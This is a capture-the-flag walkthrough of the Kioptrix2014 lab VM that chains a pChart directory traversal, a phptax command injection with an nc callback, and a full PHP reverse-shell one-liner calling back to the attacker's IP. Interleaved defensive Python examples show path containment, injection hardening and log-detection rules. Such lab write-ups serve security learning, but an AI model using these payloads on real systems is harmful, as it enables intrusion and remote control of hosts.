Kioptrix2014 - Walkthrough
I started this box with a netdiscover scan.
An nmap scan found some open ports:
I browsed to port 80 to find:
Checking the page source gives us our next clue.
Let’s browse to “pChart2.1.3…”
I then looked up exploits associated with pChart.
In the first link, I followed the directory traversal instructions
and received the contents of the passwd file!
I wanted to read more config files on the system, so I googled “freebsd default apache directory” and found the following site:
It goes on to say that the default config path is /usr/local/etc/apache2x/httpd.conf, where x is the Apache version (Apache 2.2 in our case). I substituted apache22 into the path and browsed to the URL to find:
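The traversal works because the application joins the requested file name onto its own directory without checking where the result lands. As an added example (not pChart's code and not part of this walkthrough), this is the containment check a file-serving endpoint needs; the helper name and the temporary base directory are assumed:

```python
# Added example, not pChart's code: confine a user-supplied script/file name to
# the application's own directory before opening it. The traversal above works
# because the path is joined onto the base directory with no such check.
import os
import tempfile
from typing import Optional
from urllib.parse import unquote


def resolve_under_base(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path for `requested` if it stays inside base_dir,
    otherwise None (hypothetical helper; the name is ours)."""
    # Decode twice so "..%252f" double encoding cannot slip past as a plain name.
    decoded = unquote(unquote(requested))
    if os.path.isabs(decoded):
        return None  # /etc/passwd and friends are never legitimate here
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and symlinks, so the prefix test below is meaningful.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def demo() -> dict:
    """Run the check against inputs shaped like the ones in this walkthrough."""
    with tempfile.TemporaryDirectory(prefix="pchart_demo_") as base:
        # Constructed sample resource standing in for a legitimate file under the web root.
        with open(os.path.join(base, "font.ttf"), "w") as fh:
            fh.write("constructed")
        return {
            "legit": resolve_under_base(base, "font.ttf") is not None,
            "passwd": resolve_under_base(base, "../../../../etc/passwd") is not None,
            "encoded": resolve_under_base(base, "..%2F..%2F..%2Fetc%2Fpasswd") is not None,
            "double_encoded": resolve_under_base(base, "..%252F..%252Fetc%252Fpasswd") is not None,
            "httpd_conf": resolve_under_base(base, "/usr/local/etc/apache22/httpd.conf") is not None,
        }
```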
After browsing through the file, it looks like our next target is the web server on port 8080. It also looks like we need to send a specific User-Agent string to get access, though:
Mozilla/4.0 Mozilla4_browser
I used a tool called “User Agent Switcher” to change my User-Agent string. I had to create a new entry with the info above; I selected the profile and browsed to the site.
We are presented with a directory:
Phptax presents us with:
The source file revealed the program name, but not much else.
I looked up “phptax exploit” in Google and found a related RCE exploit.
The exploit submits an HTTP request that opens an nc bind port; I changed the request to connect back to me instead.
I tried http://192.168.0.135:8080/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20192.168.0.129%201234;&pdf=make
I would get a connection back, but it would terminate immediately.
The command was executing, so there had to be another way we could use this. Let’s try creating a file:
http://192.168.0.135:8080/phptax/index.php?pfilez=1040d1-pg2.tob;entercodehere;&pdf=make
Let’s verify we can create files with: echo "" > a.php;&pdf=make
Put the command into https://meyerweb.com/eric/tools/dencoder/ to URL-encode it, then submit the request in the browser.
And entering it in the browser:
Now let’s go to http://192.168.0.135:8080/phpinfo/info.php to reveal:
Ok, let’s write a php shell and browse to it to generate a shell!
I encoded the following command to generate a php file called shell.php:
echo "<?php set_time_limit (0); \$VERSION = \"1.0\"; \$ip = \"192.168.0.129\"; \$port = 1234; \$chunk_size = 1400; \$write_a = null; \$error_a = null; \$shell = \"uname -a; w; id; /bin/sh -i\"; \$daemon = 0; \$debug = 0; if (function_exists(\"pcntl_fork\")) { \$pid = pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Cant fork\"); exit(1); } if (\$pid) { exit(0); } if (posix_setsid() == -1) { printit(\"Error: Cant setsid()\"); exit(1); } \$daemon = 1; } else { printit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\"); } chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30); if (!\$sock) { printit(\"\$errstr (\$errno)\"); exit(1); } \$descriptorspec = array( 0 => array(\"pipe\", \"r\"), 1 => array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\") ); \$process = proc_open(\$shell, \$descriptorspec, \$pipes); if (!is_resource(\$process)) { printit(\"ERROR: Cant spawn shell\"); exit(1); } stream_set_blocking(\$pipes[0], 0); stream_set_blocking(\$pipes[1], 0); stream_set_blocking(\$pipes[2], 0); stream_set_blocking(\$sock, 0); printit(\"Successfully opened reverse shell to \$ip:\$port\"); while (1) { if (feof(\$sock)) { printit(\"ERROR: Shell connection terminated\"); break; } if (feof(\$pipes[1])) { printit(\"ERROR: Shell process terminated\"); break; } \$read_a = array(\$sock, \$pipes[1], \$pipes[2]); \$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null); if (in_array(\$sock, \$read_a)) { if (\$debug) printit(\"SOCK READ\"); \$input = fread(\$sock, \$chunk_size); if (\$debug) printit(\"SOCK: \$input\"); fwrite(\$pipes[0], \$input); } if (in_array(\$pipes[1], \$read_a)) { if (\$debug) printit(\"STDOUT READ\"); \$input = fread(\$pipes[1], \$chunk_size); if (\$debug) printit(\"STDOUT: \$input\"); fwrite(\$sock, \$input); } if (in_array(\$pipes[2], \$read_a)) { if (\$debug) printit(\"STDERR READ\"); \$input = fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: \$input\"); fwrite(\$sock, \$input); } } fclose(\$sock); fclose(\$pipes[0]); fclose(\$pipes[1]); fclose(\$pipes[2]); proc_close(\$process); function printit (\$string) { if (!\$daemon) { print \"\$string\n\"; } } ?>" > shell.php
The final command in the browser was:
And we received a shell!
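The phptax bug works because the pfilez value is spliced into a shell command line when pdf=make, so a ';' ends the intended command and starts another. As an added example (not phptax's code and not part of this walkthrough), here is that vulnerable pattern, built but never executed, beside the hardened one; the converter path and the .tob file-name pattern are assumed:

```python
# Added example, not phptax's code: the injection above works because the
# pfilez value is spliced into a shell command line when pdf=make.
# vulnerable_command() reproduces that pattern but only builds the string;
# safe_command() allowlists the value and returns an argv list for
# subprocess.run(argv) with the default shell=False, so ';' is just a byte.
import re
from urllib.parse import unquote, urlsplit

PDF_TOOL = "/usr/local/bin/make-form-pdf"   # hypothetical converter binary
# Form names look like "1040d1-pg2.tob": alphanumerics and dashes, one .tob suffix.
PFILEZ_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9-]*\.tob")


def pfilez_from_url(url: str) -> str:
    """Pull the raw pfilez value out of a request URL and percent-decode it."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "pfilez":
            return unquote(value)
    raise KeyError("pfilez")


def vulnerable_command(pfilez: str) -> str:
    """Vulnerable pattern: concatenation destined for /bin/sh -c (never run here)."""
    return f"{PDF_TOOL} {pfilez}"


def commands_the_shell_would_run(cmdline: str) -> list:
    """Naive ';' split, enough to show how many commands the shell would see."""
    return [c.strip() for c in cmdline.split(";") if c.strip()]


def safe_command(pfilez: str) -> list:
    """Hardened pattern: reject anything outside the allowlist, then pass argv."""
    if not PFILEZ_RE.fullmatch(pfilez):
        raise ValueError(f"rejected pfilez value: {pfilez!r}")
    return [PDF_TOOL, pfilez]


def demo() -> dict:
    # Constructed requests mirroring the injected and the benign call above.
    injected = pfilez_from_url("http://192.168.0.135:8080/phptax/index.php"
                               "?pfilez=1040d1-pg2.tob;nc%20192.168.0.129%201234;&pdf=make")
    benign = pfilez_from_url("http://192.168.0.135:8080/phptax/index.php"
                             "?pfilez=1040d1-pg2.tob&pdf=make")
    try:
        safe_command(injected)
        rejected = False
    except ValueError:
        rejected = True
    return {"shell_commands_from_injected": commands_the_shell_would_run(vulnerable_command(injected)),
            "injected_rejected": rejected,
            "benign_argv": safe_command(benign)}
```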
Let’s see what the OS and kernel are, then check for exploits.
I searched Google:
I tried the first one: I downloaded the exploit and transferred it to the vulnerable VM with netcat.
From my Kali box:
And on the vulnerable VM:
I compiled the file with gcc, chmod’d it, and executed it to grab a root shell!
I found a congrats.txt file in the root directory.
It mentions that OSSEC is installed and has been logging alerts. I thought that was an awesome idea, so I checked out the log.
The first thing I saw was the privilege escalation exploit.
Then I saw my PHP reverse shell upload attempts.
Then finally my directory traversal attack.
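An added example, not the walkthrough's and not OSSEC's code, of what a rule-based access-log scan sees for the web-side attacks OSSEC logged above. The sample log lines are constructed to mirror this walkthrough's requests; the pChart parameter names in the first line are assumed, not taken from the page:

```python
# Added example, not the walkthrough's or OSSEC's code: a rule-based scan of
# Apache access-log lines for the web-side events OSSEC logged above. The
# sample lines are constructed to mirror this walkthrough's requests; the
# pChart parameter names in the first line are assumed, not taken from the page.
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Each rule runs over the percent-decoded request target.
RULES = [
    ("path_traversal", re.compile(r"(^|[/\\])\.\.([/\\]|$)")),
    ("command_injection", re.compile(r"[?&][^=&]+=[^&]*[;|`]\s*(nc|sh|bash|wget|curl|echo|id|uname)\b")),
    ("php_file_write", re.compile(r"echo\s.*>\s*\S+\.php")),
]

SAMPLE_LOG = """\
192.168.0.129 - - [06/Sep/2014:10:01:11 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1817 "-" "Mozilla/5.0"
192.168.0.129 - - [06/Sep/2014:10:05:42 -0400] "GET /phptax/index.php?pfilez=1040d1-pg2.tob;nc%20192.168.0.129%201234;&pdf=make HTTP/1.1" 200 0 "-" "Mozilla/4.0 Mozilla4_browser"
192.168.0.129 - - [06/Sep/2014:10:09:03 -0400] "GET /phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22%22%20%3E%20a.php;&pdf=make HTTP/1.1" 200 0 "-" "Mozilla/4.0 Mozilla4_browser"
192.168.0.129 - - [06/Sep/2014:10:12:30 -0400] "GET /phptax/index.php?pfilez=1040d1-pg2.tob&pdf=make HTTP/1.1" 200 4096 "-" "Mozilla/4.0 Mozilla4_browser"
"""


def parse_line(line: str):
    """Return the combined-log fields plus a double-decoded target, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote(unquote(rec["target"]))  # defeats %25-style double encoding
    return rec


def scan(log_text: str) -> list:
    """Return (source ip, decoded target, [rule names]) for each line that fires a rule."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = [name for name, rx in RULES if rx.search(rec["decoded"])]
        if tags:
            hits.append((rec["ip"], rec["decoded"], tags))
    return hits
```

The benign fourth line fires nothing, which is the point: the same pfilez parameter is harmless until shell metacharacters appear in it.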
And thanks to the author for this 🙂
Awesome VM, and a great idea to install OSSEC.